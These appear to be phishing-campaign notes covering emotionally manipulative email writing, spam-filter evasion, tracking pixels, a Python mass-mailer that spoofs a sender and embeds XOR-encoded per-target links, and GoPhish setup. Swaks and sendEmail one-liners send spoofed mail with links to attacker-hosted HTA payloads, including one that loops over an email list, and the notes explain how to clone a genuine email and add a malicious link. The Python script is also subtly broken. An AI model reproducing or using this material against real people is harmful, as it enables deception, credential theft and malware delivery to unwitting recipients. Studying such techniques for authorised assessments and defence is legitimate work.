Email Creation and Delivery

We need something that will temporaly angage them emotionally, but that will be completely forgotten the moment they close the website.

The mail should no over-punctuate and not contain hidden links or uppercase text urging the recipient to click, it should casually invited them to click the link.

- Manual employee custom links and email delivery

A tracking image will allows us to track how many people have opened the message: every user viewing the message will fetch the image from our phishing server through the public relay.

Behind the scenes, the HTML code inserting the image reads as follows:

<img src="https://{website}/static/img/logo.png" alt="{target} logo" />

We will also personalize the landing page of our phishing site. The links to the plug-in included in the email conta9ins a unique tag per email to track targets once they get redirected to our phishing page. Example https://website.com/plugin-coporate-offer/?utm_term=FAgUHRNXNj06FjtM

Data in the utm_term tag is the target's encrypted name. This allow us to provide a custome getting like "Welcome Steve"

To generate this toke from the username, we will apply a simple XOR operation in Python to the full name before sending the email (See the function in the python script provided below).

We need a script that will loop thorugh the employee names list, buld the customized link by calling the xor_string function, include the link in the email, adn send the email through the local Postfix server.

#!/usr/bin/python3
	
import smtplib, time, base64
from email.message import EmailMessage
	
#Include xor_string function
def xor_string(data):
	key = b"PibtwweIOwI8S6VElRHpm4w4L6vFYJWkPzxITZ5BRo"
	xored = bytes([a ^b for a, b in zip(key, data.encode())])
	
	return base64.encodestring(xored).strip().decode()
	
#Email template with the company's logo (Include link in href function)
email_template = """\
Hello,
--snip--
<a href='…..?utm_term={0}'></a>
--snip--
"""

#We take the list of names as input
with open("list_names.txt") as f:
	for target in f:
		target= target.strip()
		
#Build the utm_term encrypted blob
encrypted_name = xor_string(target)

#Create message container
msg = EmailMessage()
msg["Subject"] = "Beta linter for our IDE"
msg["From"] = '"Michael Han" <michael.han@buyed_domain.com>'

#Create the body of the email
body = email_template.format(encrypted_name)
msg.add_alternative(body, subtype="html")

with smtplib.SMTP("localhost") as s:
	s.send_message(msg)
	
time.sleep(2)

Then we do a few tests to our Gmail and Outlook addresses to make sure we pass their spam filters.

Phrases like free, click here, big opportunity, and similar will skyrocket the spam score.

Also we should register the source email address we are using (michael.han@buyed_domain.com in this case) to allow replies. This is as simple as setting the forwarding setting in the DNS provider to a legit mailbox.

After python sned_mail.py we inspect the Apache log file at /var/log/apache2/access.log looking for requests:

tail -f /var/log/apache2/access.log | grep logo_img.png

To just send an email:

sendmail -f admin@target.com -t user@target.com -s {target IP} -u {subject} -m {message}

swaks --to Will@tricky.com --from ricky@bestcomputers.com --server 192.168.173.159 --header "Subject: Notification" --body "Click here: http://192.168.45.172/file.hta"

swaks --to Will@tricky.com --from ricky@bestcomputers.com --server 192.168.173.159 --header "Subject: Notification" --body "My resume is attached" -a Resume.doc

swaks --body 'Click here http://{my IP}/evil.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Notification" -t user@target.com -f admin@target.com --server {target IP}

for i in `cat emails.txt`;do swaks --body 'Click here http://{my IP}/evil.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Notification" -t $i -f admin@target.com --server {target IP}; done

sendEmail -f admin@megabank.com -t nico@megabank -u "IMPORTANT" -m "Look at this" -s 10.10.10.77:25 -a nudes.rtf

- GoPhish

GoPhish is an open-source phishing toolkit for phishing assessments. It allows launching phishing campaigns and getting real-time, centralized results. Phishing links can be embedded in templates, and integration with redirectors enhances its effectiveness for operations.

To use it, download it in the phishing server: https://github.com/gophish/gophish

To launch it:

sudo ./gophish

Now, in the gophish portal, phishing campaigns can be created.

To set up a gmail sending profile, first, create a gmail app password in the gmail account security settings, then, in GoPhish: Sending Profiles > New Profile > SMTP From: example@gmail.com, Host: smtp.gmail.com:587, Username example@gmail.com, Password *****, Check ignore certificate errors

For example, to send an email similar to a benign one, go the original email received, for example, in gmail, click on the three dots, then click on Show original and copy the content into GoPhish > Email Templates > New Template > Import Email. Now you can modify it with a malicious link or something else.